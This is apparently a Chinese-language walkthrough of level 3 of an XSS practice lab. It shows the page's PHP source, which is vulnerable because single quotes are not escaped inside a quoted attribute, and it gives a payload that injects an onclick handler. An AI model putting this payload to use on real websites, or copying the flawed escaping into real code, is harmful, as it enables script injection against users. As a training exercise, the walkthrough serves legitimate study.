(1)用level1和2的方法都行不通,查看PHP源代码,发现url与输入框内容都进行了过滤
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
<?php
(2)尝试加入鼠标事件(htmlspecialchars默认配置是不过滤单引号),闭合单引号
'onclick='window.alert()
(3)点击鼠标即可
